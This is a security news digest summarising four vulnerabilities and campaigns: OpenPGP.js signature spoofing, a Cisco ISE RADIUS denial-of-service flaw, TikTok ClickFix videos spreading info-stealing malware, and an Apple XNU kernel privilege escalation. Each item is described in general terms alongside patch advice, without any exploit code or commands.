OpenPGP.js Flaw (CVE-2025-47934): Critical Signature Spoofing Vulnerability in JavaScript Encryption Library
A critical flaw in OpenPGP.js, a widely used JavaScript library for handling encrypted email, could allow attackers to spoof digital signatures and make tampered messages appear authentic. Tracked as CVE-2025-47934, this vulnerability affects versions 5 and 6 of the library and has now been patched. The issue impacts many browser extensions and server applications that rely on OpenPGP.js to verify the integrity of messages. Affected apps include projects like FlowCrypt, PGP Anywhere, and Passbolt. Developers have released fixed versions—5.11.3 and 6.1.1—and users are encouraged to update or apply available workarounds immediately. The vulnerability centers around how the library handles signature checks during message verification and decryption. By pairing a legitimate signature with modified or unrelated content, an attacker can trick the library into confirming that the entire message is valid. This flaw can be exploited using either inline-signed or signed-and-encrypted messages. If a valid signature is available, the attacker can attach it to altered content that wasn't originally signed, and the library will still say the signature checks out. This effectively breaks the trust model behind digital signatures, allowing false information to pass as verified. It's a serious issue for any system relying on OpenPGP.js for secure communication, and updating is critical to restore proper signature validation.
Cisco ISE 3.4 Vulnerability (CVE Pending): Unauthenticated RADIUS DoS Flaw Threatens Network Access Control
Cisco has issued an alert for a serious vulnerability in Identity Services Engine (ISE) version 3.4 that could allow unauthenticated attackers to cause a denial-of-service (DoS) condition remotely. The flaw originates from improper validation of RADIUS authentication requests, a protocol widely used to control network access through Cisco ISE. Attackers can exploit this by sending specially crafted authentication packets via any connected network access device (NAD) configured to rely on ISE for AAA (authentication, authorization, and accounting). Once processed, the malformed request causes the ISE instance to reload unexpectedly, cutting off authentication services and disrupting access control across the environment. The attack requires no credentials or elevated privileges, making it a low-complexity yet high-impact threat to enterprise networks where ISE is deployed. The vulnerability only affects Cisco ISE version 3.4, with all prior versions confirmed unaffected. It targets explicitly RADIUS-enabled deployments, which is a concern since RADIUS services are active by default in standard configurations. Organizations using ISE for TACACS+ exclusively are not exposed to this threat vector. Cisco has addressed the issue in the newly released version 3.4P1, and affected users are urged to update immediately, as no workarounds or mitigations are available short of patching. The company’s Product Security Incident Response Team (PSIRT) states there is no evidence of active exploitation at this time, offering a brief window for proactive remediation. Enterprises relying on ISE for critical access control should prioritize this and assess exposure across all authentication touchpoints to prevent potential outages or targeted disruption by opportunistic threat actors.
UPDATE: TikTok ClickFix Campaign: Info-Stealing Malware Spread Through AI-Generated Videos
Cybercriminals are using TikTok to spread Vidar and StealC malware by tricking users into running fake activation commands through a tactic known as ClickFix. Often generated using AI, these videos claim to unlock premium features in popular software like Windows, Microsoft Office, CapCut, and Spotify. Viewers are instructed to run a PowerShell command, which downloads a script from a malicious site and installs malware. One video claiming to "boost your Spotify experience" has already reached half a million views, showing how quickly this threat is spreading. Once installed, the malware can steal login credentials, browser data, crypto wallets, and even 2FA tokens. The attack works by downloading and launching a hidden malware process, then pulling in a second script that ensures the malware runs every time the system starts. Both Vidar and StealC are powerful info-stealers that target a wide range of data, including web browsers, desktop files, and authentication apps. TikTok’s algorithm amplifies the threat, helping these malicious videos reach large audiences quickly. ClickFix tactics are not new but have become more dangerous as they leverage AI and social platforms for wider reach. Attackers have also used similar strategies in espionage campaigns backed by nation-state actors, proving how versatile and damaging these techniques can be.
UPDATE: Apple XNU Kernel Flaw (CVE-2025-31219): Local Privilege Escalation Risk Across All Apple Platforms
Apple has patched a high-severity vulnerability in its XNU kernel that could allow attackers to gain full control of devices running macOS, iOS, iPadOS, tvOS, watchOS, and visionOS. The flaw, CVE-2025-31219, lets a local attacker move from basic user access to full kernel-level privileges. This opens the door to a complete system takeover, including unauthorized access to sensitive data and critical system functions. Apple pushed out emergency updates for all supported versions, and users are strongly advised to install them without delay to stay protected. The issue is tied to how the XNU kernel manages memory, specifically around virtual memory operations. A race condition caused by missing locks during memory access lets an attacker interfere with kernel processes at the right moment, corrupting memory or gaining elevated access. This flaw is dangerous because it doesn’t require any user interaction or complex conditions—just local access and low-level privileges. Once triggered, the exploit allows changes far beyond the initial process, giving attackers deep control over the entire system. Apple’s patch fixes the underlying memory handling issue, but systems that haven’t been updated remain at risk as this vulnerability is actively exploited in the wild. Security teams should prioritize patching and keep an eye out for any unusual activity that might point to exploitation attempts.
